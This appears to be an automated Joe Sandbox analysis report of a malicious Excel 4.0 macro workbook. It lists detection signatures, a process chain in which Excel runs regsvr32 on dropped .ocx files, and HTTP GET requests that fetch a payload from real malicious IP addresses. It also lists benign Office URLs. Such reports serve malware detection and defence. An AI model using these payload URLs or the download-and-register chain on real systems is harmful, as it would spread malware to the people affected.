Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Summary-133608431-Feb-15.xlsb

Overview

General Information

Sample Name:Summary-133608431-Feb-15.xlsb
Analysis ID:573121
MD5:0df7cebeecf0768966fdeb34957e4903
SHA1:3390ca486aaa46814ff6759296304ed033243799
SHA256:1f320ea67a6fa753b536d33c190b5c9a4e8d02c58767860adff70b6c24b99f13
Infos:

Detection

Hidden Macro 4.0
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Yara detected Xls With Macro 4.0
Sigma detected: Excel Network Connections
Potential document exploit detected (performs HTTP gets)
IP address seen in connection with other malware
Document misses a certain OLE stream usually present in this Microsoft Office document type

Classification

  • System is w10x64
  • EXCEL.EXE (PID: 3464 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • regsvr32.exe (PID: 6184 cmdline: regsvr32 C:\ProgramData\Hroser1.ocx MD5: 426E7499F6A7346F0410DEAD0805586B)
    • regsvr32.exe (PID: 6232 cmdline: regsvr32 C:\ProgramData\Hroser2.ocx MD5: 426E7499F6A7346F0410DEAD0805586B)
    • regsvr32.exe (PID: 6280 cmdline: regsvr32 C:\ProgramData\Hroser3.ocx MD5: 426E7499F6A7346F0410DEAD0805586B)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
app.xmlJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    System Summary

    barindex
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 C:\ProgramData\Hroser1.ocx, CommandLine: regsvr32 C:\ProgramData\Hroser1.ocx, CommandLine|base64offset|contains: ,, Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 3464, ProcessCommandLine: regsvr32 C:\ProgramData\Hroser1.ocx, ProcessId: 6184
    Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0": Data: DestinationIp: 185.141.26.236, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, Initiated: true, ProcessId: 3464, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49749

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: http://185.252.215.41/4864943733141980.datAvira URL Cloud: Label: malware
    Source: http://185.141.26.236/4864943733141980.datAvira URL Cloud: Label: malware
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior

    Software Vulnerabilities

    barindex
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileAJump to behavior
    Source: global trafficTCP traffic: 192.168.2.5:49749 -> 185.141.26.236:80
    Source: global trafficTCP traffic: 192.168.2.5:49749 -> 185.141.26.236:80
    Source: global trafficHTTP traffic detected: GET /4864943733141980.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.141.26.236Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /4864943733141980.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.252.215.41Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /4864943733141980.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 188.165.62.32Connection: Keep-Alive
    Source: Joe Sandbox ViewIP Address: 185.252.215.41 185.252.215.41
    Source: unknownTCP traffic detected without corresponding DNS query: 185.141.26.236
    Source: unknownTCP traffic detected without corresponding DNS query: 185.141.26.236
    Source: unknownTCP traffic detected without corresponding DNS query: 185.141.26.236
    Source: unknownTCP traffic detected without corresponding DNS query: 185.141.26.236
    Source: unknownTCP traffic detected without corresponding DNS query: 185.252.215.41
    Source: unknownTCP traffic detected without corresponding DNS query: 185.252.215.41
    Source: unknownTCP traffic detected without corresponding DNS query: 185.252.215.41
    Source: unknownTCP traffic detected without corresponding DNS query: 185.252.215.41
    Source: unknownTCP traffic detected without corresponding DNS query: 188.165.62.32
    Source: unknownTCP traffic detected without corresponding DNS query: 188.165.62.32
    Source: unknownTCP traffic detected without corresponding DNS query: 188.165.62.32
    Source: unknownTCP traffic detected without corresponding DNS query: 188.165.62.32
    Source: unknownTCP traffic detected without corresponding DNS query: 185.141.26.236
    Source: unknownTCP traffic detected without corresponding DNS query: 185.252.215.41
    Source: unknownTCP traffic detected without corresponding DNS query: 188.165.62.32
    Source: unknownTCP traffic detected without corresponding DNS query: 188.165.62.32
    Source: unknownTCP traffic detected without corresponding DNS query: 185.252.215.41
    Source: unknownTCP traffic detected without corresponding DNS query: 185.141.26.236
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 16 Feb 2022 08:20:18 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 16 Feb 2022 08:20:18 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 16 Feb 2022 08:20:19 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://addinslicensing.store.office.com/apps/remove
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://api.aadrm.com
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://api.aadrm.com/
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://api.addins.store.office.com/addinstemplate
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://api.cortana.ai
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://api.diagnostics.office.com
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://api.microsoftstream.com/api/
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://api.office.net
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://api.onedrive.com
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://apis.live.net/v5.0/
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://augloop.office.com
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://augloop.office.com/v2
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://cdn.entity.
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://clients.config.office.net/
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://config.edge.skype.com
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://cortana.ai
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://cortana.ai/api
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://cr.office.com
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://dataservice.o365filtering.com
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://dataservice.o365filtering.com/
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://dev.cortana.ai
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://devnull.onenote.com
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://directory.services.
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://edu-mathreco-prod.trafficmanager.net
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://edu-mathreco-prod.trafficmanager.net/MathRecognizer.Recognize
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://edu-mathsolver-prod.trafficmanager.net
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://edu-mathsolver-prod.trafficmanager.net/MathSolver.Solve
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://enrichment.osi.office.net/
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://graph.ppe.windows.net
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://graph.ppe.windows.net/
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://graph.windows.net
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://graph.windows.net/
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&amp;premium=1
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&amp;premium=1
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&amp;premium=1
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://incidents.diagnostics.office.com
    Source: 677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
